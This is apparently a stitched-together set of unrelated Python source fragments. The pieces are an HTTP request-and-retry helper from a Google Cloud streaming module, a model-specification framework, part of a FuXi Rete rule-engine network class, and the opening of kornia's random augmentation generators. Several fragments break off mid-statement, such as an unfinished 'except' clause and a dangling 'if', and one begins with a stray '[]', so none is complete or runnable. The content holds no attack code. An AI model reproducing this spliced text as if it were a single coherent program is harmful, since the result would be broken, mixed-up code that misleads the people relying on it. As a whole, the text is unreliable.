:param http_request: the request to send.
:type redirections: int
:param redirections: Number of redirects to follow.
:rtype: :class:`Response`
:returns: an object representing the server's response
:raises: :exc:`google.cloud.streaming.exceptions.RequestError` if no
response could be parsed.
"""
connection_type = None
# Handle overrides for connection types. This is used if the caller
# wants control over the underlying connection for managing callbacks
# or hash digestion.
if getattr(http, 'connections', None):
url_scheme = parse.urlsplit(http_request.url).scheme
if url_scheme and url_scheme in http.connections:
connection_type = http.connections[url_scheme]
# Custom printing only at debuglevel 4
new_debuglevel = 4 if httplib2.debuglevel == 4 else 0
with _httplib2_debug_level(http_request, new_debuglevel, http=http):
info, content = http.request(
str(http_request.url), method=str(http_request.http_method),
body=http_request.body, headers=http_request.headers,
redirections=redirections, connection_type=connection_type)
if info is None:
raise RequestError()
response = Response(info, content, http_request.url)
_check_response(response)
return response
def make_api_request(http, http_request, retries=7,
redirections=_REDIRECTIONS):
"""Send an HTTP request via the given http, performing error/retry handling.
:type http: :class:`httplib2.Http`
:param http: an instance which implements the `Http` API.
:type http_request: :class:`Request`
:param http_request: the request to send.
:type retries: int
:param retries: Number of retries to attempt on retryable
responses (such as 429 or 5XX).
:type redirections: int
:param redirections: Number of redirects to follow.
:rtype: :class:`Response`
:returns: an object representing the server's response.
:raises: :exc:`google.cloud.streaming.exceptions.RequestError` if no
response could be parsed.
"""
retry = 0
while True:
try:
return _make_api_request_no_retry(http, http_request,
redirections=redirections)
        except _RETRYABLE_EXCEPTIONS as
<filename>src/mframework/_mframework.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Copyright 2019-2020 Airinnova AB and the Model-Framework authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------
# Author: <NAME>
"""
Model framework
===============
.. code::
| User space | Specification
| ---------- | -------------
| |
| Model | <--- ModelSpec
| | | |
| | | |
| Feature | (<---) FeatureSpec
| | |
| | |
| (Properties) |
"""
from abc import abstractmethod, ABCMeta
from math import inf
from uuid import uuid4
from schemadict import schemadict, STANDARD_VALIDATORS
from ._log import logger
from ._utils import UniqueDict, ItemDict
PRIMITIVE_TYPES = (bool, int, float, str, dict, list, tuple)
SchemadictValidators = STANDARD_VALIDATORS
class S:
pos_int = {'type': int, '>=': 0}
def is_primitve_type(obj):
return obj in PRIMITIVE_TYPES
def check_type(var_name, var, exp_type):
if not isinstance(var, exp_type):
raise TypeError(
f"invalid type for {var_name!r}: expected {exp_type}, got {type(var)}"
)
class SpecDict(UniqueDict):
"""
Specification dictionary.
* Specification entries can only be defined once.
"""
def __setitem__(self, key, value):
if not isinstance(value, SpecEntry):
raise ValueError(f"key {key!r}: value must be instance of 'SpecEntry'")
super().__setitem__(key, value)
class SpecEntry:
def __init__(self, schema, required=1, max_items=inf, doc='', uid_required=False):
"""
Specification entry
Sensible defaults
-----------------
* The number of required items is set to 1.
* The maximum number of items is set to infinity. Setting 'max_items=1'
would also be sensible. However, it is easier to define infinity here.
"""
self.schema = schema
self.required = required
self.max_items = max_items
self.doc = doc
self.uid_required = uid_required
@property
def schema(self):
return self._schema
@schema.setter
def schema(self, schema):
self._schema = schema
@property
def required(self):
return self._required
@required.setter
def required(self, required):
schemadict({'required': S.pos_int}).validate({'required': required})
self._required = required
@property
def max_items(self):
return self._max_items
@max_items.setter
def max_items(self, max_items):
if max_items != inf:
schemadict({'max_items': S.pos_int}).validate({'max_items': max_items})
if max_items < self.required:
raise ValueError("'max_items' must be larger than the number of required items")
self._max_items = max_items
@property
def singleton(self):
return self.max_items == 1
@property
def uid_required(self):
return self._uid_required
@uid_required.setter
def uid_required(self, uid_required):
check_type('uid_required', uid_required, bool)
if uid_required and self.singleton:
raise ValueError("'uid_required' does only apply if item is singleton")
self._uid_required = uid_required
@property
def doc(self):
return self._doc
@doc.setter
def doc(self, doc):
check_type('doc', doc, str)
self._doc = doc
class _BaseSpec:
def __init__(self):
"""
Base class to store a collection of item specifications.
The term 'item' may refer to a property (e.g. the number 5) if this
class describes a feature, or it may also refer to a feature itself if
this class describes a model.
Attrs:
:uid: (str) unique identifier
:_specs: (dict) specifications (value) of items (key)
"""
self.uid = str(uuid4())
self._specs = SpecDict()
@property
def keys(self):
"""Return all spec keys"""
return list(self._specs.keys())
def __repr__(self):
return f"<Specification for {tuple(self._specs.keys())!r}>"
def _add_item_spec(self, key, schema, *, required=1, max_items=inf, doc='', uid_required=False):
"""
Add a specification entry
Args:
:key: (str) name of item to specify
:schema: (obj) specification
:required: (int) number of required items
:max_items: (int) maximum number of items
:doc: (str) documentation
            :uid_required: (bool) if True, a UID must be provided when adding items
Note:
            * 'schema' should be a primitive type or a 'schemadict' if this
class describes a feature. It should be an instance of
'FeatureSpec' if this class describes a model.
* When calling from subclass, add a user input check for 'schema'
"""
self._specs[key] = SpecEntry(schema, required, max_items, doc, uid_required)
def _provide_user_class_from_base(self, base):
"""
Return a user space class which subclasses from 'base'
Args:
:base: (obj) base class
Returns:
:UserSpace: (obj) user space class with specification reference
"""
class UserSpace(base):
_parent_specs = self._specs
_parent_uid = self.uid
return UserSpace
def get_docs(self):
"""
Return user documentation
Returns:
:docs: (dict) full documentation
"""
docs = {}
for key, spec in self._specs.items():
subdocs = None
if isinstance(getattr(spec, 'schema', None), _BaseSpec):
subdocs = spec.schema.get_docs()
docs[key] = {
'main': self._specs[key].doc,
'sub': subdocs,
'schema': self._specs[key].schema,
'required': self._specs[key].required,
'max_items': self._specs[key].max_items,
'uid_required': self._specs[key].uid_required,
}
return docs
class _UserSpaceBase:
_level = '$NONE'
_parent_specs = None
_parent_uid = None
def __init__(self):
"""
Base class for user space functionality for 'model' or 'feature'.
Attrs:
:uid: (str) unique identifier
            :_items: (dict) stored values (value) of items (key)
"""
self.uid = str(uuid4())
self._items = ItemDict()
def __repr__(self):
return f"<User space for {tuple(self._parent_specs.keys())!r}>"
@property
def keys(self):
"""Return all item keys"""
return self._items.keys()
def singleton(self, key):
"""
Return True if 'key' specifies singleton items
Args:
:key: (str) name of item
"""
return self._parent_specs[key].singleton
def from_dict(self, d):
"""
Add user values from a dictionary
Args:
:d: (dict) key-value pairs
Returns:
:self: (obj) reference to self
"""
check_type(f'{d!r}', d, dict)
for key, value in d.items():
if key.startswith('$'):
continue
self._check_key_in_spec(key)
if self.singleton(key):
self.set(key, value[0])
else:
self.add_many(key, *value)
return self
def to_dict(self):
"""
Represent model/feature as a dictionary
Returns:
:dictionary: (dict) key-value pairs
"""
return {
'$level': self._level,
'$uid': self.uid,
**{k: list(v.values()) for k, v in self._items.items()}
}
def get_default(self, key):
"""
Return the model/feature default values
"""
raise NotImplementedError
def set(self, key, value):
"""
Set a value (singleton)
Args:
:key: (str) name of item to specify
:value: (obj) value of the item to specify
"""
self._check_key_in_spec(key)
self._check_against_schema(key, value)
if not self.singleton(key):
raise RuntimeError(f"key {key!r}: method 'set()' does not apply, try 'add()'")
logger.debug(f"Set property {key!r} = {value!r} in {self!r}")
del self._items[key]
self._items[key] = value
def add(self, key, value, uid=None):
"""
Add a value (non-singleton)
Args:
:key: (str) name of item to specify
:value: (obj) value of the item to specify
"""
self._check_key_in_spec(key)
self._check_below_max_items(key)
self._check_uid_required(key, uid)
self._check_against_schema(key, value)
if self.singleton(key):
raise RuntimeError(f"key {key!r}: method 'add()' does not apply, try 'set()'")
logger.debug(f"Add property {key!r} = {value!r} (num: {len(self._items[key])+1}) in {self!r}")
# "Append" values to dictionary
self._items[key] = value
if uid is not None:
self._items.assign_uid(key, uid)
def add_many(self, key, *values):
"""
Add multiple items (non-singleton)
* Method does not support keys which require UIDs
Args:
:key: (str) name of property to specify
:values: (obj) values of the item to specify
"""
for value in values:
self.add(key, value)
def get(self, key, default=None, *, uid=None):
"""
Return a value (singleton/non-singleton)
Args:
:key: (str) name of item
:uid: (str) return a named item
:default: (obj) value returned if value is not found in items
Returns:
:value: (obj) value of the item
"""
# Always throw error if key is not in specification
self._check_key_in_spec(key)
# Return the default value if the key is not in the '_items' dict. Note
# that '_items' returns an empty list if the key is not in the dict.
if not self._items[key]:
return default
        if self.singleton(key):
            if uid is not None:
                logger.warning(f"ignoring UID {uid!r} since not applicable for singletons")
            return self._items[key][0]
else:
if uid is not None:
return self._items.get_by_uid(key, uid)
else:
return list(self._items[key].values())
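    # Illustrative call pattern (hypothetical keys; they would have to exist in the
    # parent specification):
    #   model.set('title', 'my model')               # singleton item
    #   model.add('wing', {'span': 10}, uid='main')  # non-singleton item with a UID
    #   model.get('wing', uid='main')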
def iter(self, key):
"""
Return an iterator for values of 'key' (non-singleton)
Args:
:key: (str) name of item
"""
if self.singleton(key):
raise KeyError(f"Method 'iter()' not supported for item {key!r}, try 'get()'")
yield from list(self._items[key].values())
def iter_uids(self, key):
"""
Return an iterator for values of 'key' (non-singleton)
Args:
:key: (str) name of item
"""
if self.singleton(key):
raise KeyError(f"Method 'iter()' not supported for item {key!r}, try 'get()'")
# TODO !!!
yield from self._items.iter_uids(key)
def get_uid(self, key, idx):
return self._items.get_uid(key, idx)
def len(self, key):
return len(self._items[key])
def clear(self):
raise NotImplementedError
def remove(self):
raise NotImplementedError
def _check_key_in_spec(self, key):
if key not in self._parent_specs.keys():
raise KeyError(f"key {key!r} is not in specification")
def _check_below_max_items(self, key):
if not len(self._items[key].values()) < self._parent_specs[key].max_items:
raise RuntimeError(f"maximum number of items for key {key!r} has been set")
def _check_uid_required(self, key, uid):
if self._parent_specs[key].uid_required and uid is None:
raise RuntimeError(f"key {key!r} requires a UID")
def _check_against_schema(self, key, value):
# TODO: look over logic
if isinstance(self._parent_specs[key].schema, dict):
if not isinstance(value, dict):
schemadict(
{key: self._parent_specs[key].schema},
validators=SchemadictValidators,
).validate({key: value})
else:
# Schema has schemadict format
schemadict(
self._parent_specs[key].schema,
validators=SchemadictValidators
).validate(value)
[]
for s, p, o in self.inferredFacts.triples((None, RDF.type, None)):
if s in unionClosureG.predicates() or\
s in [_s for _s, _p, _o in
unionClosureG.triples_choices(
(None,
RDF.type,
[OWL_NS.Class,
OWL_NS.Restriction]))]:
self.inferredFacts.remove((s, p, o))
return noNegFacts
def setupDescriptionLogicProgramming(self,
owlN3Graph,
expanded=[],
addPDSemantics=True,
classifyTBox=False,
constructNetwork=True,
derivedPreds=[],
ignoreNegativeStratus=False,
safety=DATALOG_SAFETY_NONE):
rt = [rule
for rule in MapDLPtoNetwork(self,
owlN3Graph,
complementExpansions=expanded,
constructNetwork=constructNetwork,
derivedPreds=derivedPreds,
ignoreNegativeStratus=ignoreNegativeStratus,
safety=safety)]
if ignoreNegativeStratus:
rules, negRules = rt
rules = set(rules)
self.negRules = set(negRules)
else:
rules = set(rt)
if constructNetwork:
self.rules.update(rules)
additionalRules = set(AdditionalRules(owlN3Graph))
if addPDSemantics:
from FuXi.Horn.HornRules import HornFromN3
additionalRules.update(HornFromN3(StringIO(non_DHL_OWL_Semantics)))
if constructNetwork:
for rule in additionalRules:
self.buildNetwork(iter(rule.formula.body),
iter(rule.formula.head),
rule)
self.rules.add(rule)
else:
rules.update(additionalRules)
if constructNetwork:
rules = self.rules
# noRules = len(rules)
if classifyTBox:
self.feedFactsToAdd(generateTokenSet(owlN3Graph))
# print("##### DLP rules fired against OWL/RDF TBOX", self)
return rules
def reportSize(self, tokenSizeThreshold=1200, stream=sys.stdout):
for pattern, node in list(self.nodes.items()):
if isinstance(node, BetaNode):
for largeMem in [i for i in iter(node.memories.values()) if len(i) > tokenSizeThreshold]:
if largeMem:
print("Large apha node memory extent: ")
pprint(pattern)
print(len(largeMem))
def reportConflictSet(self, closureSummary=False, stream=sys.stdout):
tNodeOrder = [tNode
for tNode in self.terminalNodes
if self.instantiations.get(tNode, 0)]
tNodeOrder.sort(key=lambda x: self.instantiations[x], reverse=True)
for termNode in tNodeOrder:
print(termNode)
print("\t", termNode.clauseRepresentation())
print("\t\t%s instantiations" % self.instantiations[termNode])
if closureSummary:
print(self.inferredFacts.serialize(
destination=stream, format='turtle'))
def parseN3Logic(self, src):
store = N3RuleStore(additionalBuiltins=self.ruleStore.filters)
Graph(store).parse(src, format='n3')
store._finalize()
assert len(store.rules), "There are no rules passed in."
from FuXi.Horn.HornRules import Ruleset
for rule in Ruleset(n3Rules=store.rules,
nsMapping=self.nsMap):
self.buildNetwork(iter(rule.formula.body),
iter(rule.formula.head),
rule)
self.rules.add(rule)
self.alphaNodes = [node for node in list(self.nodes.values()) if isinstance(node, AlphaNode)]
self.alphaBuiltInNodes = [node for node in list(self.nodes.values()) if isinstance(node, BuiltInAlphaNode)]
def __repr__(self):
total = 0
for node in list(self.nodes.values()):
if isinstance(node, BetaNode):
total += len(node.memories[LEFT_MEMORY])
total += len(node.memories[RIGHT_MEMORY])
return "<Network: %s rules, %s nodes, %s tokens in working memory, %s inferred tokens>" % (
len(self.terminalNodes), len(self.nodes), total, len(self.inferredFacts))
def closureGraph(self, sourceGraph, readOnly=True, store=None):
if readOnly:
if store is None and not sourceGraph:
store = Graph().store
store = store is None and sourceGraph.store or store
roGraph = ReadOnlyGraphAggregate([sourceGraph, self.inferredFacts],
store=store)
roGraph.namespace_manager = NamespaceManager(roGraph)
for srcGraph in [sourceGraph, self.inferredFacts]:
for prefix, uri in srcGraph.namespaces():
roGraph.namespace_manager.bind(prefix, uri)
return roGraph
else:
cg = ConjunctiveGraph()
cg += sourceGraph
cg += self.inferredFacts
return cg
def _setupDefaultRules(self):
"""
Checks every alpha node to see if it may match against a 'universal truth' (one w/out a LHS)
"""
for node in list(self.nodes.values()):
if isinstance(node, AlphaNode):
node.checkDefaultRule(self.universalTruths)
def clear(self):
self.nodes = {}
self.alphaPatternHash = {}
self.rules = set()
for alphaPattern in xcombine(('1', '0'), ('1', '0'), ('1', '0')):
self.alphaPatternHash[tuple(alphaPattern)] = {}
self.proofTracers = {}
self.terminalNodes = set()
self.justifications = {}
self._resetinstantiationStats()
self.workingMemory = set()
self.dischargedBindings = {}
def reset(self, newinferredFacts=None):
"Reset the network by emptying the memory associated with all Beta Nodes nodes"
for node in list(self.nodes.values()):
if isinstance(node, BetaNode):
node.memories[LEFT_MEMORY].reset()
node.memories[RIGHT_MEMORY].reset()
self.justifications = {}
self.proofTracers = {}
self.inferredFacts = newinferredFacts if newinferredFacts is not None else Graph()
self.workingMemory = set()
self._resetinstantiationStats()
def fireConsequent(self, tokens, termNode, debug=False):
"""
"In general, a p-node also contains a specifcation of what production it corresponds to | the
name of the production, its right-hand-side actions, etc. A p-node may also contain information
about the names of the variables that occur in the production. Note that variable names
are not mentioned in any of the Rete node data structures we describe in this chapter. This is
        intentional: it enables nodes to be shared when two productions have conditions with the same
basic form, but with different variable names."
Takes a set of tokens and the terminal Beta node they came from
and fires the inferred statements using the patterns associated
with the terminal node. Statements that have been previously inferred
or already exist in the working memory are not asserted
"""
if debug:
print("%s from %s" % (tokens, termNode))
# newTokens = []
termNode.instanciatingTokens.add(tokens)
def iterCondition(condition):
if isinstance(condition, Exists):
return condition.formula
return isinstance(condition, SetOperator) and condition or iter([condition])
def extractVariables(term, existential=True):
if isinstance(term, existential and BNode or Variable):
yield term
elif isinstance(term, Uniterm):
for t in term.toRDFTuple():
if isinstance(t, existential and BNode or Variable):
yield t
#replace existentials in the head with new BNodes!
BNodeReplacement = {}
for rule in termNode.rules:
if isinstance(rule.formula.head, Exists):
for bN in rule.formula.head.declare:
if not isinstance(rule.formula.body, Exists) or \
bN not in rule.formula.body.declare:
BNodeReplacement[bN] = BNode()
for rhsTriple in termNode.consequent:
if BNodeReplacement:
rhsTriple = tuple([BNodeReplacement.get(term, term) for term in rhsTriple])
if debug:
if not tokens.bindings:
tokens._generateBindings()
key = tuple([None if isinstance(item, BNode) else item for item in rhsTriple])
override, executeFn = termNode.executeActions.get(key, (None, None))
if override:
#There is an execute action associated with this production
                #that is attached to the given consequent triple and
#is meant to perform all of the production duties
#(bypassing the inference of triples, etc.)
executeFn(termNode, None, tokens, None, debug)
else:
for inferredTriple, binding in _mulPatternWithSubstitutions(tokens, rhsTriple, termNode):
if [term for term in inferredTriple if isinstance(term, Variable)]:
                        #Unfulfilled bindings (skip non-ground head literals)
if executeFn:
                            #The indicated execute action is supposed to be triggered
                            #when the indicated RHS triple is inferred
                            #(even if it is not ground)
executeFn(termNode, inferredTriple, tokens, binding, debug)
continue
# if rhsTriple[1].find('subClassOf_derived')+1:import pdb;pdb.set_trace()
inferredToken = ReteToken(inferredTriple)
self.proofTracers.setdefault(inferredTriple, []).append(binding)
self.justifications.setdefault(inferredTriple, set()).add(termNode)
if termNode.filter and inferredTriple not in self.filteredFacts:
self.filteredFacts.add(inferredTriple)
if inferredTriple not in self.inferredFacts and inferredToken not in self.workingMemory:
# if (rhsTriple == (Variable('A'), RDFS.RDFSNS['subClassOf_derived'], Variable('B'))):
# import pdb;pdb.set_trace()
if debug:
print("Inferred triple: ", inferredTriple, " from ", termNode.clauseRepresentation())
inferredToken.debug = True
self.inferredFacts.add(inferredTriple)
self.addWME(inferredToken)
currIdx = self.instantiations.get(termNode, 0)
currIdx += 1
self.instantiations[termNode] = currIdx
if executeFn:
#The indicated execute action is supposed to be triggered
                            #when the indicated RHS triple is inferred for the
#first time
executeFn(termNode, inferredTriple, tokens, binding, debug)
if self.goal is not None and self.goal in self.inferredFacts:
raise InferredGoal("Proved goal " + repr(self.goal))
else:
if debug:
print("Inferred triple skipped: ", inferredTriple)
if executeFn:
#The indicated execute action is supposed to be triggered
                            #when the indicated RHS triple is inferred for the
#first time
executeFn(termNode, inferredTriple, tokens, binding, debug)
def addWME(self, wme):
"""
        procedure add-wme (w: WME) exhaustive hash table version
let v1, v2, and v3 be the symbols in the three fields of w
alpha-mem = lookup-in-hash-table (v1, v2, v3)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
alpha-mem = lookup-in-hash-table (v1, v2, *)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
alpha-mem = lookup-in-hash-table (v1, *, v3)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
...
alpha-mem = lookup-in-hash-table (*, *, *)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
end
"""
# print(wme.asTuple())
for termComb, termDict in iteritems(self.alphaPatternHash):
for alphaNode in termDict.get(wme.alphaNetworkHash(termComb), []):
# print("\t## Activated AlphaNode ##")
# print("\t\t", termComb, wme.alphaNetworkHash(termComb))
# print("\t\t", alphaNode)
alphaNode.activate(wme.unboundCopy())
def feedFactsToAdd(self, tokenIterator):
"""
Feeds the network an iterator of facts / tokens which are fed to the alpha nodes
which propagate the matching process through the network
"""
for token in tokenIterator:
self.workingMemory.add(token)
# print(token.unboundCopy().bindingDict)
self.addWME(token)
def _findPatterns(self, patternList):
rt = []
for betaNodePattern, alphaNodePatterns in \
[(patternList.__getslice__(0, -i), patternList.__getslice__(-i, len(patternList))) for i in range(1, len(patternList))]:
# [(patternList[:-i], patternList[-i:]) for i in xrange(1, len(patternList))]:
assert isinstance(betaNodePattern, HashablePatternList)
assert isinstance(alphaNodePatterns, HashablePatternList)
if betaNodePattern in self.nodes:
rt.append(betaNodePattern)
rt.extend([HashablePatternList([aPattern]) for aPattern in alphaNodePatterns])
return rt
for alphaNodePattern in patternList:
rt.append(HashablePatternList([alphaNodePattern]))
return rt
def createAlphaNode(self, currentPattern):
"""
"""
if isinstance(currentPattern, N3Builtin):
node = BuiltInAlphaNode(currentPattern)
else:
node = AlphaNode(currentPattern, self.ruleStore.filters)
self.alphaPatternHash[node.alphaNetworkHash()].setdefault(node.alphaNetworkHash(groundTermHash=True), []).append(node)
if not isinstance(node, BuiltInAlphaNode) and node.builtin:
s, p, o = currentPattern
node = BuiltInAlphaNode(N3Builtin(p, self.ruleStore.filters[p](s, o), s, o))
return node
def _resetinstantiationStats(self):
self.instantiations = dict([(tNode, 0) for tNode in self.terminalNodes])
def checkDuplicateRules(self):
checkedClauses = {}
for tNode in self.terminalNodes:
for rule in tNode.rules:
collision = checkedClauses.get(rule.formula)
assert collision is None, "%s collides with %s" % (
tNode, checkedClauses[rule.formula])
checkedClauses.setdefault(tNode.rule.formula, []).append(tNode)
def registerReteAction(self, headTriple, override, executeFn):
"""
Register the given execute function for any rule with the
given head using the override argument to determine whether or
not the action completely handles the firing of the rule.
The signature of the execute action is as follows:
def someExecuteAction(tNode, inferredTriple, token, binding):
.. pass ..
"""
for tNode in self.terminalNodes:
for rule in tNode.rules:
                if
<filename>kornia/augmentation/random_generator/random_generator.py
from typing import cast, Dict, Optional, Tuple, Union
import torch
from torch.distributions import Bernoulli
from kornia.geometry import bbox_generator
from kornia.utils import _extract_device_dtype
from ..utils import _adapted_beta, _adapted_sampling, _adapted_uniform, _common_param_check, _joint_range_check
def random_prob_generator(
batch_size: int,
p: float = 0.5,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> torch.Tensor:
r"""Generate random probabilities for a batch of inputs.
Args:
batch_size (int): the number of images.
p (float): probability to generate an 1-d binary mask. Default value is 0.5.
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
torch.Tensor: parameters to be passed for transformation.
- probs (torch.Tensor): element-wise probabilities with a shape of (B,).
Note:
The generated random numbers are not reproducible across different devices and dtypes.
"""
_common_param_check(batch_size, same_on_batch)
if not isinstance(p, (int, float)) or p > 1 or p < 0:
raise TypeError(f"The probability should be a float number within [0, 1]. Got {type(p)}.")
_bernoulli = Bernoulli(torch.tensor(float(p), device=device, dtype=dtype))
probs_mask: torch.Tensor = _adapted_sampling((batch_size,), _bernoulli, same_on_batch).bool()
return probs_mask
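# Usage sketch (illustrative only; not part of this module's API surface):
#   mask = random_prob_generator(batch_size=4, p=0.25)  # BoolTensor of shape (4,)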
def random_color_jitter_generator(
batch_size: int,
brightness: Optional[torch.Tensor] = None,
contrast: Optional[torch.Tensor] = None,
saturation: Optional[torch.Tensor] = None,
hue: Optional[torch.Tensor] = None,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> Dict[str, torch.Tensor]:
r"""Generate random color jiter parameters for a batch of images.
Args:
batch_size (int): the number of images.
brightness (torch.Tensor, optional): Brightness factor tensor of range (a, b).
The provided range must follow 0 <= a <= b <= 2. Default value is [0., 0.].
contrast (torch.Tensor, optional): Contrast factor tensor of range (a, b).
The provided range must follow 0 <= a <= b. Default value is [0., 0.].
saturation (torch.Tensor, optional): Saturation factor tensor of range (a, b).
The provided range must follow 0 <= a <= b. Default value is [0., 0.].
        hue (torch.Tensor, optional): Hue factor tensor of range (a, b).
The provided range must follow -0.5 <= a <= b < 0.5. Default value is [0., 0.].
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
params Dict[str, torch.Tensor]: parameters to be passed for transformation.
- brightness_factor (torch.Tensor): element-wise brightness factors with a shape of (B,).
- contrast_factor (torch.Tensor): element-wise contrast factors with a shape of (B,).
- hue_factor (torch.Tensor): element-wise hue factors with a shape of (B,).
- saturation_factor (torch.Tensor): element-wise saturation factors with a shape of (B,).
- order (torch.Tensor): applying orders of the color adjustments with a shape of (4). In which,
0 is brightness adjustment; 1 is contrast adjustment;
2 is saturation adjustment; 3 is hue adjustment.
Note:
The generated random numbers are not reproducible across different devices and dtypes.
"""
_common_param_check(batch_size, same_on_batch)
_device, _dtype = _extract_device_dtype([brightness, contrast, hue, saturation])
brightness = torch.as_tensor([0.0, 0.0] if brightness is None else brightness, device=device, dtype=dtype)
contrast = torch.as_tensor([0.0, 0.0] if contrast is None else contrast, device=device, dtype=dtype)
hue = torch.as_tensor([0.0, 0.0] if hue is None else hue, device=device, dtype=dtype)
saturation = torch.as_tensor([0.0, 0.0] if saturation is None else saturation, device=device, dtype=dtype)
_joint_range_check(brightness, "brightness", (0, 2))
_joint_range_check(contrast, "contrast", (0, float('inf')))
_joint_range_check(hue, "hue", (-0.5, 0.5))
_joint_range_check(saturation, "saturation", (0, float('inf')))
brightness_factor = _adapted_uniform((batch_size,), brightness[0], brightness[1], same_on_batch)
contrast_factor = _adapted_uniform((batch_size,), contrast[0], contrast[1], same_on_batch)
hue_factor = _adapted_uniform((batch_size,), hue[0], hue[1], same_on_batch)
saturation_factor = _adapted_uniform((batch_size,), saturation[0], saturation[1], same_on_batch)
return dict(
brightness_factor=brightness_factor.to(device=_device, dtype=_dtype),
contrast_factor=contrast_factor.to(device=_device, dtype=_dtype),
hue_factor=hue_factor.to(device=_device, dtype=_dtype),
saturation_factor=saturation_factor.to(device=_device, dtype=_dtype),
order=torch.randperm(4, device=_device, dtype=_dtype).long(),
)
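# Usage sketch (illustrative only): jitter factors for a batch of 8 images, varying
# brightness while leaving the other ranges at their defaults.
#   params = random_color_jitter_generator(8, brightness=torch.tensor([0.9, 1.1]))
#   params['brightness_factor'].shape  # -> torch.Size([8])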
def random_perspective_generator(
batch_size: int,
height: int,
width: int,
distortion_scale: torch.Tensor,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> Dict[str, torch.Tensor]:
r"""Get parameters for ``perspective`` for a random perspective transform.
Args:
batch_size (int): the tensor batch size.
height (int) : height of the image.
width (int): width of the image.
distortion_scale (torch.Tensor): it controls the degree of distortion and ranges from 0 to 1.
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
params Dict[str, torch.Tensor]: parameters to be passed for transformation.
- start_points (torch.Tensor): element-wise perspective source areas with a shape of (B, 4, 2).
- end_points (torch.Tensor): element-wise perspective target areas with a shape of (B, 4, 2).
Note:
The generated random numbers are not reproducible across different devices and dtypes.
"""
_common_param_check(batch_size, same_on_batch)
assert (
distortion_scale.dim() == 0 and 0 <= distortion_scale <= 1
), f"'distortion_scale' must be a scalar within [0, 1]. Got {distortion_scale}."
assert (
type(height) is int and height > 0 and type(width) is int and width > 0
), f"'height' and 'width' must be integers. Got {height}, {width}."
start_points: torch.Tensor = torch.tensor(
[[[0.0, 0], [width - 1, 0], [width - 1, height - 1], [0, height - 1]]],
device=distortion_scale.device,
dtype=distortion_scale.dtype,
).expand(batch_size, -1, -1)
# generate random offset not larger than half of the image
fx = distortion_scale * width / 2
fy = distortion_scale * height / 2
factor = torch.stack([fx, fy], dim=0).view(-1, 1, 2)
# TODO: This line somehow breaks the gradcheck
rand_val: torch.Tensor = _adapted_uniform(
start_points.shape,
torch.tensor(0, device=device, dtype=dtype),
torch.tensor(1, device=device, dtype=dtype),
same_on_batch,
).to(device=distortion_scale.device, dtype=distortion_scale.dtype)
pts_norm = torch.tensor(
[[[1, 1], [-1, 1], [-1, -1], [1, -1]]], device=distortion_scale.device, dtype=distortion_scale.dtype
)
end_points = start_points + factor * rand_val * pts_norm
return dict(start_points=start_points, end_points=end_points)
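# Usage sketch (illustrative only): source/target corners for a mild perspective warp.
#   params = random_perspective_generator(2, 224, 224, torch.tensor(0.3))
#   params['start_points'].shape  # -> torch.Size([2, 4, 2]); same for 'end_points'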
def random_affine_generator(
batch_size: int,
height: int,
width: int,
degrees: torch.Tensor,
translate: Optional[torch.Tensor] = None,
scale: Optional[torch.Tensor] = None,
shear: Optional[torch.Tensor] = None,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> Dict[str, torch.Tensor]:
r"""Get parameters for ``affine`` for a random affine transform.
Args:
batch_size (int): the tensor batch size.
height (int) : height of the image.
width (int): width of the image.
degrees (torch.Tensor): Range of degrees to select from like (min, max).
translate (tensor, optional): tuple of maximum absolute fraction for horizontal
and vertical translations. For example translate=(a, b), then horizontal shift
is randomly sampled in the range -img_width * a < dx < img_width * a and vertical shift is
randomly sampled in the range -img_height * b < dy < img_height * b. Will not translate by default.
scale (tensor, optional): scaling factor interval, e.g (a, b), then scale is
randomly sampled from the range a <= scale <= b. Will keep original scale by default.
shear (tensor, optional): Range of degrees to select from.
Shear is a 2x2 tensor, a x-axis shear in (shear[0][0], shear[0][1]) and y-axis shear in
(shear[1][0], shear[1][1]) will be applied. Will not apply shear by default.
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
params Dict[str, torch.Tensor]: parameters to be passed for transformation.
- translations (torch.Tensor): element-wise translations with a shape of (B, 2).
- center (torch.Tensor): element-wise center with a shape of (B, 2).
- scale (torch.Tensor): element-wise scales with a shape of (B, 2).
- angle (torch.Tensor): element-wise rotation angles with a shape of (B,).
- sx (torch.Tensor): element-wise x-axis shears with a shape of (B,).
- sy (torch.Tensor): element-wise y-axis shears with a shape of (B,).
Note:
The generated random numbers are not reproducible across different devices and dtypes.
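    Example:
        A minimal illustrative call (the argument values here are arbitrary and the
        sampled parameters are random, so concrete outputs vary):
            params = random_affine_generator(
                batch_size=2, height=224, width=224,
                degrees=torch.tensor([-10.0, 10.0]))
            # params["angle"] is expected to have shape (2,)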
"""
_common_param_check(batch_size, same_on_batch)
_joint_range_check(degrees, "degrees")
assert (
isinstance(width, (int,)) and isinstance(height, (int,)) and width > 0 and height > 0
